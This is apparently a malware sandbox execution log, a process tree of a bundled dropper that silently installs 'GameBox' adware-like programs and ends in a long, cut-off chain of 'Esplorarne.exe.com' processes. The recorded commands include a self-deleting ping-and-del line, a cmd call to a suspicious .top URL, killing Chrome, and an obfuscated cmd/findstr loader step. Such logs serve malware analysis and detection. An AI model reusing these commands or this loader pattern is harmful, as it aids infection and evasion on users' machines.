"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-83P9D.tmp\{app}\vdi_compiler.exe"
8⤵
PID:9688

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
9⤵
- Runs ping.exe
PID:5896

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
7⤵
PID:5464

C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
7⤵
PID:8640

C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5704

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629405739 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
4⤵
PID:7704

C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
3⤵
- Executes dropped EXE
PID:5748

C:\Users\Admin\AppData\Local\Temp\is-J85U3.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J85U3.tmp\WEATHER Manager.tmp" /SL5="$202F8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
4⤵
PID:6048

C:\Users\Admin\AppData\Local\Temp\is-3J5AI.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-3J5AI.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
5⤵
PID:8144

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-3J5AI.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-3J5AI.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629405739 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
6⤵
PID:8532

C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
3⤵
- Executes dropped EXE
PID:5832

C:\Users\Admin\AppData\Local\Temp\is-FQ6TC.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FQ6TC.tmp\VPN.tmp" /SL5="$10396,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
4⤵
PID:6140

C:\Users\Admin\AppData\Local\Temp\is-4302V.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-4302V.tmp\Setup.exe" /silent /subid=720
5⤵
PID:5820

C:\Users\Admin\AppData\Local\Temp\is-6A68S.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6A68S.tmp\Setup.tmp" /SL5="$402AA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-4302V.tmp\Setup.exe" /silent /subid=720
6⤵
PID:6268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
7⤵
PID:4428

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:6140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
7⤵
PID:6236

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
8⤵
PID:6620

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
7⤵
PID:2448

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
7⤵
PID:9856

C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5856

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
4⤵
PID:4532

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
5⤵
- Kills process with taskkill
PID:5968

C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
3⤵
- Executes dropped EXE
PID:5348

C:\Users\Admin\AppData\Local\Temp\tmp3ACE_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp3ACE_tmp.exe"
4⤵
PID:6752

C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
5⤵
PID:6228

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
5⤵
PID:7800

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:8004

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
7⤵
PID:5564

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
7⤵
PID:6932

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
8⤵
PID:3196

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
9⤵
PID:8212

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
10⤵
PID:8696

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
11⤵
PID:9072

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
12⤵
PID:8572

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
13⤵
PID:9112

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
14⤵
PID:2088

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
15⤵
PID:7736

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
16⤵
PID:9460

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
17⤵
PID:10044

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
18⤵
PID:9512

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
19⤵
PID:9800

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
20⤵
PID:4684

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
21⤵
PID:8284

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
22⤵
PID:3456

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
23⤵
PID:9780

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
24⤵
PID:10104

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
25⤵
PID:9252

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
26⤵
PID:3160

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
27⤵
PID:9692

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
28⤵
PID:9512

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
29⤵
PID:10072

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
30⤵
PID:7300

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
31⤵
PID:8704

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
32⤵
PID:9608

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
33⤵
PID:9272

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
34⤵
PID:9220

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
35⤵
PID:7648

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
36⤵
PID:4700

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
37⤵
PID:9948

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
38⤵
PID:10048

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
39⤵
PID:9980

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
40⤵
PID:9412

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
41⤵
PID:9652

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
42⤵
PID:6600

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
43⤵
PID:9624

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
44⤵
PID:8204

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
45⤵
PID:6728

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
46⤵
PID:1356

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
47⤵
PID:8440

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
48⤵
PID:4576

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
49⤵
PID:6600

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
50⤵
PID:7152

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
51⤵
PID:8568

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
52⤵
PID:7024

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
53⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
54⤵
PID:8240

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
55⤵
PID:9484

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
56⤵
PID:10008

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
57⤵
PID:8684

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
58⤵
PID:8940

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
59⤵
PID:10200

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
60⤵
PID:4308

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
61⤵
PID:8204

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
62⤵
PID:984

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
63⤵
PID:5488

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
64⤵
PID:4468

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
65⤵
PID:6048

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
66⤵
PID:9328

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
67⤵
PID:9708

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
68⤵
PID:8836

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
69⤵
PID:6672

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
70⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
71⤵
PID:8792

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
72⤵
PID:1048

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
73⤵
PID:7724

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
74⤵
PID:8488

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
75⤵
PID:9828

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
76⤵
PID:1488

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
77⤵
PID:9300

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
78⤵
PID:6372

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
79⤵
PID:4548

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
80⤵
PID:10148

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
81⤵
PID:2448

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
82⤵
PID:8988

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
83⤵
PID:10032

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
84⤵
PID:8880

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
85⤵
PID:9300

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
86⤵
PID:10200

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
87⤵
PID:8836

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
88⤵
PID:9804

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
89⤵
PID:8728

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
90⤵
PID:10164

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
91⤵
PID:4308

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
92⤵
PID:8656

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
93⤵
PID:5464

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
94⤵
PID:1048

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
95⤵
PID:9636

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
96⤵
PID:9968

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
97⤵
PID:4608

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
98⤵
PID:9992

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
99⤵
PID:8352

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
100⤵
PID:8880

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
101⤵
PID:7516

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
102⤵
PID:6620

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
103⤵
PID:9680

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
104⤵
PID:8116

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
105⤵
PID:8904

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
106⤵
PID:8880

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
107⤵
PID:1048

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
108⤵
PID:4368

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
109⤵
PID:10232

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
110⤵
PID:9680

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
111⤵
PID:9316

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
112⤵
PID:8352

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
113⤵
PID:5680

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
114⤵
PID:1828

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
115⤵
PID:7312

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
116⤵
PID:9636

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
117⤵
PID:4368

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
118⤵
PID:6304

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
119⤵
PID:6832

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
120⤵
PID:8632

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
121⤵
PID:8352

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
122⤵
PID:8488

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
123⤵
PID:9624

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
124⤵
PID:7508

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
125⤵
PID:7012

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
126⤵
PID:692

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
